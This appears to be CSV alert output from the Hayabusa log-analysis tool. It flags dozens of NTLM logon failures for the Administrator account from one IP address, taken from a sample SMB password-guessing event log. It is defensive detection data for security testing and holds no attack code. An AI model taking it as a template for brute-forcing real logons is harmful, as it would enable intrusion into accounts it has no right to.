+2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jmLxSIastsvqdJC8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IPyvUDHHWzbhyvZE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S7dF4fIlAvIBYiw0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bPDPtH2m9TgW8Khg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AChGHCNom0ds5ujV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8sLQI4KGgQRq2Sy9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dqeLFLRT5EXiCBUC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Dx3tco9up7XnOa7h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZdNX4ubtpQaV9EeF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: S05I0ZlGKGazkVkL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pzbfrYSYhxH6WcCt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZGTvXs8Mlc0Fi7iT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C1LjtTFjPfPlBqAi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1lhJW3iO1xGGTMhp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IMz7WmlBTgadVgN8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OB02epCA5pc5oBeJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KAFgReUMtu9VerRl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ByeL26yQfohpQT3z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 527r3nh9ocmItXfL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HNeC1BBFVXv839Ys  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: juXXpQcoPfJLMQ3L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: njNdv4lGnsUpooCP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j6VchLhWJT7cCWVR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r3xxnFpbd8zkFm0h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jtf156NEpOebQHGC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 17O1jfGX6KQMPgnD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3NaqTqrCiPPfNxZF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Az7cwIWXUGVIMTv5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Djaxf99PVs2VkMy6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rbTSoTdaQ0Y4c9Gw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: g9aTo4QBHfrgPYZ2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dpHKjYzZTn0ruIrf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HqhPnV6tc8airRqu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RIOCqtXh5ji12U5q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RwuGZ0kgg1yToLlr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZSBbd4qBRuzeKBjD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8zS1Muxc9gpcqv23  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c6wiIkfkgtso42P1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1ilRmhSB5RfvpVa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PuQ47GGBraimypWL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UfUsAYWilbwMScpE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 22ZSltGNwIl0DNDM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IYwG9IUpdk5DmM8w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4a8kbGxQFHDBodGF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KoLqIaO8p3k9kOkj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rUnonSx3ZBdkyGhu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d1QJziwKhsaJljGV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZhcNRrpODYB9jZxs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Yi5JE53caVn7n54w  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Jx6qTASzFp830ud6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b4L8HtBWlmAMTjCf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F4hVfTwibHreepku  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3TlapK211UT8SO0W  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mzzw3uPkn2cgtmlF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aPnfUjwJei5E5BD7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mm1k0eeKAYokIbDg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w8TDNcJ3LMyNtUe1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ogKKslkdXvc9f130  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sgoy6gMfe5N0UiP5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lfjf3d6I8TsBOzvc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Vs8DG8s81oOwYoI7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LFkgN1aDoYkQ4qrT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KMwLokYpcFIYHegd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6oKradBV4ERsQnKs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0qPzlzfmgrbYTKqQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qKYlBm2lhobHzbjh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DBMu96oqO9tb3f4O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tO04Q3eYdzyuy51v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FrIa2UrSrfdhkDCx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: axhhyMrGl95O16Vg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: atjvfi8QeEDluhL2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9HPBZKUiiKeyQwSr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
